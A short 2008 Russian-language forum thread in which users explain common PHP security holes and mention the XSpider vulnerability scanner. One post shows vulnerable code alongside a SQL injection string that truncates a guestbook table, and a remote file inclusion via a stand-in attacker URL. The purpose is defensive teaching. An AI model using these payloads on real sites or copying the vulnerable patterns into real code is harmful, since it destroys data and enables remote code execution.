Без описания |
Поиск в теме | Версия для печати |
Furax |
Отправлено: 24 Июля, 2008 - 10:28:36
|
Бледнотик
Покинул форум
Сообщений всего: 1472
Дата рег-ции: Март 2007
Откуда: Иркутск, Сибирь, СССР
Карма 32
|
Пример.
В коде гостевой, сохраняющем сообщение в базу данных, написано:CODE:mysql_query("INSERT INTO `gbook` (`name`, `mesage`) VALUES('$_POST[name]', '$_POST['message'])"); Хакер вводит в поле 'name'CODE:mike', 'hello'); TRUNCATE TABLE `gbook`; INSERT INTO `gbook` (`name`, `mesage`) VALUES('XaKeP В итоге в БД пошёл запрос, очищающий всю гостевую. Причина? Забыли слэши вставить.
Ещё пример. Написано:CODE:include("$_GET[topic].php"); Это подключает содержимое. Хакер передал в поле $_GET['topic'] строку "http://haker.ru/badpage". В итоге то, что доступно по адресу "http://haker.ru/badpage.php", выполнено на нашем сайте. Причина? Не проверили, что в этой переменной.
И так далее.
Как правило, в учебниках по PHP предостерегают об ошибках; кроме того, есть специальные учебники по безопасности. Погугли - вроде по теме выдайт.(Отредактировано автором: 24 Июля, 2008 - 10:29:12) |
|
|
Gosudar |
Отправлено: 24 Июля, 2008 - 13:59:28
|
Newbie
Покинул форум
Сообщений всего: 16
Дата рег-ции: Март 2004
Карма 0
|
Цитата:Где я могу узнать о возможных дырах?
Цитата:Можно даже хакера знакомого попросить сломать...
есть софт специальный. для поиска потенциальных дыр.
К примеру программа XSpider. В гугле легко находится (Отредактировано автором: 24 Июля, 2008 - 13:59:50) |
|
|
|
Поиск в теме | Версия для печати |
Страниц (1): [1] |
Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0, скрытых: 0) |
« PHP/Perl » |
Все гости форума могут просматривать этот раздел. Только администраторы и модераторы могут создавать новые темы в этом разделе. Только администраторы и модераторы могут отвечать на сообщения в этом разделе.
|
|
|